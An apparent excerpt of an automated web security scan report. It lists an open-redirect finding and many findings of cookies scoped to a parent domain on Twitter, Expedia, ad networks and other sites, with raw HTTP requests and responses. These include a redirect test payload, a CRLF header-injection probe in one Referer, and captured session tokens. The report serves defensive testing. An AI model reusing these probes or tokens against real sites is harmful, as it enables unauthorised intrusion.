User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://ae1138bbd2776f84f/a?gif
Date: Fri, 06 May 2011 18:39:34 GMT
Connection: close
Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Sun, 05-May-2013 18:39:34 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

16.3. http://d.xp1.ru4.com/activity [redirect parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://d.xp1.ru4.com
Path:   /activity

Issue detail

The value of the redirect request parameter is used to perform an HTTP redirect. The payload .a4916f41be22b8b64/ was submitted in the redirect parameter. This caused a redirection to the following URL:

The application attempts to prevent redirection attacks by prepending an absolute prefix to the user-supplied URL. However, this prefix does not include a trailing slash, so an attacker can add an additional domain name to point to a domain which they control.

Remediation detail

When prepending an absolute prefix to the user-supplied URL, the application should ensure that the prefixed domain name is followed by a slash.

Request

GET /activity?_o=62795&_t=cm_bk&redirect=.a4916f41be22b8b64/ HTTP/1.1
Host: d.xp1.ru4.com
Proxy-Connection: keep-alive
Referer: http://tags.bluekai.com/site/2576?ret=html&phint=u=80312807C795402E93C5016D2A2A3E1B&phint=ord=7169916033744.81
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X1ID=AM-00000000030620452; O1807966=16; P1807966=c3N2X2MyfFl8MTMwNDM2MDM2MHxzc3ZfYnxjMnwxMzA0MzYwMzYwfHNzdl8xfDI4NTQ0NTQ3M3wxMzA0MzYwMzYwfA==

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-Java-System-Web-Server/7.0
Date: Fri, 06 May 2011 22:33:42 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Pragma: no-cache
Set-cookie: O62795=0; domain=.ru4.com; path=/; expires=Mon, 01-Jan-1970 12:00:00 GMT
Location: http://.a4916f41be22b8b64/
Content-length: 0
Connection: close

17. Cookie scoped to parent domain  previous  next
There are 56 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

17.1. http://api.twitter.com/1/statuses/user_timeline.json  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://api.twitter.com
Path:   /1/statuses/user_timeline.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/statuses/user_timeline.json?include_entities=1&include_available_features=1&contributor_details=true&include_rts=true&user_id=24459574 HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://api.twitter.com/receiver.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
X-PHX: true
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=130314166807091166; __utmz=43838368.1303561994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); k=173.193.214.243.1304470443436909; __utma=43838368.551233229.1303561994.1304617828.1304721594.4; __utmc=43838368; __utmb=43838368.1.10.1304721594; _twitter_sess=BAh7CjoMY3NyZl9pZCIlYWE5YTBlZmFmNzAwM2UwZDIwOWRmZDJkOWU1OTMy%250AODc6DnJldHVybl90byIkaHR0cDovL3R3aXR0ZXIuY29tL1NvY2lhbEZvbGxv%250AdzoPY3JlYXRlZF9hdGwrCMPlZMYvASIKZmxhc2hJQzonQWN0aW9uQ29udHJv%250AbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoHaWQiJTgwNGQ4%250AYWRlNDZmOTk5ZWNkOWM4MGEzYzI3MGY5ZjI0--8891229de7e28d860da29be28f8a516671ce98f8

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 17:40:09 GMT
Server: hi
Status: 200 OK
X-Transaction: 1304703609-30473-34243
X-RateLimit-Limit: 1000
ETag: "07cee35ad36c4b6979ad1fda1c8bb051"-gzip
Last-Modified: Fri, 06 May 2011 17:40:09 GMT
X-RateLimit-Remaining: 997
X-Runtime: 0.02318
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114bc137096
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api_phoenix
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: c9c59e83fb5603f4fb8ee0e90708cc03f51ed091
X-RateLimit-Reset: 1304707199
Set-Cookie: original_referer=JbKFAfGwv4RwApvTLqS%2BuSg2nN6n6Sc2FNg%2B%2FJZdApHOHiilCO8gnQ%3D%3D; path=/
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlYWE5YTBlZmFmNzAwM2UwZDIwOWRmZDJkOWU1OTMy%250AODc6DnJldHVybl90byIkaHR0cDovL3R3aXR0ZXIuY29tL1NvY2lhbEZvbGxv%250AdzoPY3JlYXRlZF9hdGwrCMPlZMYvAToHaWQiJTgwNGQ4YWRlNDZmOTk5ZWNk%250AOWM4MGEzYzI3MGY5ZjI0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpG%250AbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--6bd1977f1842a61d06074014f6ed8747cb8e4463; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Connection: close
Content-Length: 36346

{"statuses":[{"text":"Is it possible that I am feeling socially inadequate?","coordinates":null,"truncated":false,"id_str":"66530188304990208","source":"web","geo":null,"favorited":false,"retweet_coun
...[SNIP]...
17.2. http://www.clone-systems.com/ecommerce/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.clone-systems.com
Path:   /ecommerce/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ecommerce/ HTTP/1.1
Host: www.clone-systems.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RECENTLY_VIEWED_PRODUCTS=8; CMSSESSIDe4d04fcf=eo21307v4qsv52mm0588i4v2r1

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 00:47:46 GMT
Server: Apache
Set-Cookie: SHOP_SESSION_TOKEN=qs1om4bp16nlerqj0n7otjneq3; expires=Sun, 08-May-2011 00:47:46 GMT; path=/ecommerce/; domain=.clone-systems.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 28692

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
   


...[SNIP]...
17.3. http://www.clone-systems.com/ecommerce/index.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.clone-systems.com
Path:   /ecommerce/index.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ecommerce/index.php?action=tracking_script HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.clone-systems.com

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 00:54:49 GMT
Server: Apache
Set-Cookie: SHOP_SESSION_TOKEN=eh9g2srl048i41kr56sr7gdb93; expires=Sun, 08-May-2011 00:54:50 GMT; path=/ecommerce/; domain=.clone-systems.com
Expires: Sat, 14 May 2011 00:54:50 +0000
Cache-Control: public,maxage=604800
Pragma: public
Content-Length: 190
Content-Type: text/javascript


               var img = new Image(1, 1);
               img.src = 'http://www.clone-systems.com/ecommerce/index.php?action=track_visitor&'+new Date().getTime();
               img.onload = function() { return true; };
           
17.4. https://www.clone-systems.com/ecommerce/index.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.clone-systems.com
Path:   /ecommerce/index.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ecommerce/index.php?action=tracking_script HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Host: www.clone-systems.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 00:55:30 GMT
Server: Apache
Set-Cookie: SHOP_SESSION_TOKEN=sea1lu7lraticbpq2b4jg4uup4; expires=Sun, 08-May-2011 00:55:30 GMT; path=/ecommerce/; domain=.clone-systems.com
Expires: Sat, 14 May 2011 00:55:30 +0000
Cache-Control: public,maxage=604800
Pragma: public
Content-Length: 191
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/javascript


               var img = new Image(1, 1);
               img.src = 'https://www.clone-systems.com/ecommerce/index.php?action=track_visitor&'+new Date().getTime();
               img.onload = function() { return true; };
           
17.5. http://www.expedia.com/Hotels  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.expedia.com
Path:   /Hotels

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Hotels HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/pub/agent.dll?qscr=flex&subm=1&city=AUS&citd=DTW&date1=3&mnth=5/1/2011&rgst=%0D%0Ans:netsparker056650=vuln&rged=10&fxst=0&load=1&cAdu=1&rfrr=-429
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; jscript=1; srvys=v.1%2C2%2C0; s1=`user=v.8,0,EX011A614213$F4$B5205000c$27$E96$32i$A00$32i$A00$32i$A001000$31000$1E310$2302!50$F9Y$D9$0A$9E$23$C5E$82$AB$89$FB!e02000`131; p1=`tpid=v.1,1`accttype=v.2,3,1,EX01833E44F8$E8$24$DD$0C$AB$A2$18$37$25$18$F1$B6$8Ak$16$E6$24i$5B$39$8B$91H`gacct=v.1,1,215819496`linfo=v.4,|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`airp=v.1,AUS`188; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dexpedia1%253D%252526pid%25253D50053%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.expedia.com/Hotels%252526ot%25253DA%2526undefinedtoJSONString%252CtoJSONString%253Dfunction%252520%252528%252529%25257Bvar%252520a%25253D%25255B%252522%25257B%252522%25255D%25252Cb%25252Ck%25252Cv%25253Bfunction%252520p%252528s%252529%25257Bif%252528b%252529%25257Ba.push%252528%252522%25252C%252522%252529%25253B%25257D%25250Aa.push%252528k.toJSONString%252528%252529%25252C%252522%25253A%252522%25252Cs%252529%25253Bb%25253Dtrue%25253B%25257D%25250Afor%252528k%252520in%252520this%252529%25257Bif%252528this.hasOwnProperty%252528k%252529%252529%25257Bv%25253Dthis%25255Bk%25255D%25253Bswitch%252528typeof%252520v%252529%25257Bcase%252522object%252522%25253Aif%252528v%252529%25257Bif%252528typeof%252520v.toJSONString%25253D%25253D%25253D%252522function%252522%252529%25257Bp%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257Delse%25257Bp%252528%252522null%252522%252529%25253B%25257D%25250Abreak%25253Bcase%252522string%252522%25253Acase%252522number%252522%25253Acase%252522boolean%252522%25253Ap%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257D%25257D%25250Aa.push%252528%252522%25257D%252522%252529%25253Breturn%252520a.join%252528%252522%252522%252529%25253B%25257D%3B

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Date: Fri, 06 May 2011 22:42:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: iEAPID=000,; Domain=.expedia.com; Path=/
Set-Cookie: JSESSION=ed861fe0-7e58-4a15-a1dc-ba3f1f9818e7; Domain=.expedia.com; Path=/
Set-Cookie: s1=`0; Domain=.expedia.com; Path=/
Set-Cookie: p1=`gacct=v.1,1,215819496`tpid=v.1,1`airp=v.1,AUS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`98; Domain=.expedia.com; Expires=Fri, 06-May-2016 03:46:24 GMT; Path=/
Content-Length: 133396

<!DOCTYPE html>
<html>
   <head>
       <meta name="language" content="en_US"/>
<meta name="robots" content="noydir, noodp"/>
<title>Hotels: Find cheap hotel deals & resorts, make hotel reservations | E
...[SNIP]...
17.6. http://www.lbmc.com/about_us  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.lbmc.com
Path:   /about_us

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /about_us HTTP/1.1
Host: www.lbmc.com
Proxy-Connection: keep-alive
Referer: http://www.lbmc.com/landing/pci.htm?gclid=CPPNuPTV1KgCFeM85QodgmKbjA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=224675399.1304749048.1.1.utmgclid=CPPNuPTV1KgCFeM85QodgmKbjA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=224675399.208570725.1304749048.1304749048.1304749048.1; __utmc=224675399; __utmb=224675399.1.10.1304749048

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 07 May 2011 01:14:52 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
Set-Cookie: SESS083a1ac464c2b3bbfee975b7136aef65=u46gksfej3ltndtpup8vgslkp2; expires=Mon, 30-May-2011 04:48:12 GMT; path=/; domain=.lbmc.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 07 May 2011 01:14:52 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Location: http://www.lbmc.com/about-lbmc
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8

17.7. http://www.trpcweb.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.trpcweb.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.trpcweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: store, no-cache, must-revalidate,post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 07 May 2011 01:37:01 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.14
Set-Cookie: SESS965ff70c2c03801782546f5ffae8476c=1jkd7qgqokj3oj4tbtt6tsoik3; expires=Mon, 30-May-2011 05:10:21 GMT; path=/; domain=.trpcweb.com
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:37:02 GMT
Content-Length: 33980

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<meta
...[SNIP]...
17.8. http://ads.adonion.com/serving/tracking_id.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adonion.com
Path:   /serving/tracking_id.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serving/tracking_id.php?b=1&UID=13047194394361&TRSTR=1&RTID= HTTP/1.1
Host: ads.adonion.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/search/web/Linkbucks%20vlad%20modelS
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:03:52 GMT
Server: Apache/2.2.17 (Fedora)
X-Powered-By: PHP/5.3.3
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache, must-revalidate
Set-Cookie: TRUID=13047194394361; expires=Sun, 05-Jun-2011 22:03:52 GMT; path=/; domain=.adonion.com
Set-Cookie: CKTIME=1304719432; expires=Thu, 01-Mar-2012 22:03:52 GMT; path=/; domain=.adonion.com
Content-Length: 0
Connection: close
Content-Type: image/png

17.9. http://ak1.abmr.net/is/media.expedia.com  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ak1.abmr.net
Path:   /is/media.expedia.com

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /is/media.expedia.com?U=/media/content/expus/graphics/home/wiz/wizard_booking_image.gif&V=3-AuRpyTyPuRR23jelg0laLB5Ar5FVMw71WrtlweqRnmwTqUxvVczAew%3d%3d&I=929884BBD25FA5E&D=expedia.com&01AD=1& HTTP/1.1
Host: ak1.abmr.net
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/default.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 01AI=2-2-EB6E52171CDEF3034828F16E1C941C3949AF262B120D03036970D01C8BD07852-53DD7F3F0623E38C5EBD95024020364994C943A39878EF266BC6AEA67E11581E

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://media.expedia.com/media/content/expus/graphics/home/wiz/wizard_booking_image.gif?01AD=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg&01RI=929884BBD25FA5E&01NA=
Expires: Fri, 06 May 2011 22:33:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 06 May 2011 22:33:42 GMT
Connection: close
Set-Cookie: 01AI=2-2-9865754352041C4D3ADB004D99DAF971A923DE02B6BBDD40E5FC7E190B49AC77-BBFBA3CA73975ED377F4F0A96413D918F3AA52C861039BDE93D7800374D5462A; expires=Sat, 05-May-2012 22:33:42 GMT; path=/; domain=.abmr.net
P3P: policyref="http://www.abmr.net/w3c/policy.xml", CP="NON DSP COR CURa ADMa DEVa OUR SAMa IND"

17.10. http://altfarm.mediaplex.com/ad/js/16228-124632-16454-0  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/16228-124632-16454-0

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad/js/16228-124632-16454-0?mpt=570139&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3aff/3/0/%2a/f%3B241006852%3B0-0%3B0%3B37579671%3B3454-728/90%3B42070397/42088184/1%3B%3B%7Esscs%3D%3f HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/subscribe/section/122/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408; expires=Mon, 6-May-2013 4:19:15 GMT; path=/; domain=.mediaplex.com;
Location: http://img.mediaplex.com/content/0/16228/124632/728x90_Patch.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F16228-124632-16454-0%3Fmpt%3D570139&mpt=570139&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3aff/3/0/%2a/f%3B241006852%3B0-0%3B0%3B37579671%3B3454-728/90%3B42070397/42088184/1%3B%3B%7Esscs%3D%3f
Content-Length: 0
Date: Fri, 06 May 2011 21:50:11 GMT

17.11. http://as.casalemedia.com/j  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://as.casalemedia.com
Path:   /j

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /j?s=120511&u=&a=5&id=468990195&p=10&v=2&inif=1&l=0&t=0&w=1920&h=1156&z=300 HTTP/1.1
Host: as.casalemedia.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/APM/iview/148848792/direct;;wi.160;hi.600/01?click=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CMD2=AAEoyE2yFpUAAda-AAM1SAEBAAABSX1NshatAAHWvwADMMABAQAAAT5wTbIThAAB1r8AA1CpAQEAAAE8qE2yE6cAAda-AALpswEBAAABTh1NshOxAAHWvwADSxMBAQAAATk1TbH5FgAB1r8AAwS1AQEA; CMD3=AAFJfU2yGXEAAda-AAMwuwEBAAABUcZNshvmAAHWvwADXUQBAQAAAT5wTbITvQAB1r8AA1CnAQEAAAFOHU2yFpUAAda-AANLEQEBAAABPwRNshasAAHWvwAC90IBAQAAAU2CTbIZ7wAB1r8AA0r8AwMAAAFML02x+RYAAda-AAM-FgEBAA**; CMJ2=AAJzHU2y+SIB; CMS=98198&1304076182; CMD1=AAFMcU26n5YAAX+WAANDjAEBAA**; CMID=5w153q3LtckAAEY.ZOUAAAAB; CMPS=061; CMPP=006

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/javascript
Expires: Fri, 06 May 2011 20:28:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 06 May 2011 20:28:10 GMT
Content-Length: 179
Connection: close
Set-Cookie: CMID=5w153q3LtckAAEY.ZOUAAAAB;domain=casalemedia.com;path=/;expires=Sat, 05 May 2012 20:28:10 GMT
Set-Cookie: CMPS=061;domain=casalemedia.com;path=/;expires=Thu, 04 Aug 2011 20:28:10 GMT
Set-Cookie: CMPP=006;domain=casalemedia.com;path=/;expires=Thu, 04 Aug 2011 20:28:10 GMT
Set-Cookie: CMSC=TcRZ2g**;domain=casalemedia.com;path=/;
Set-Cookie: CMD3=AAFJfU3EWdoAAda-AAMwuwECAAABPnBNxFnaAAHWvwADUKcBAgA*;domain=casalemedia.com;path=/;expires=Sun, 05 Jun 2011 20:28:10 GMT

document.write('<iframe src="http://cdn.optmd.com/V2/81520/217255/index.html" width="160" height="600" marginwidth="0" marginheight="0" frameborder="0" scrolling="no"></iframe>');
17.12. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=2&c2=6402952&rn=336110646&c7=http%3A%2F%2Fwww.linkedin.com%2Fpub%2Fsocial-follow%2F12%2F7a2%2F294&c8=Social%20Follow%20%7C%20LinkedIn&c9=http%3A%2F%2Fburp%2Fshow%2F0&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.linkedin.com/pub/social-follow/12/7a2/294
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
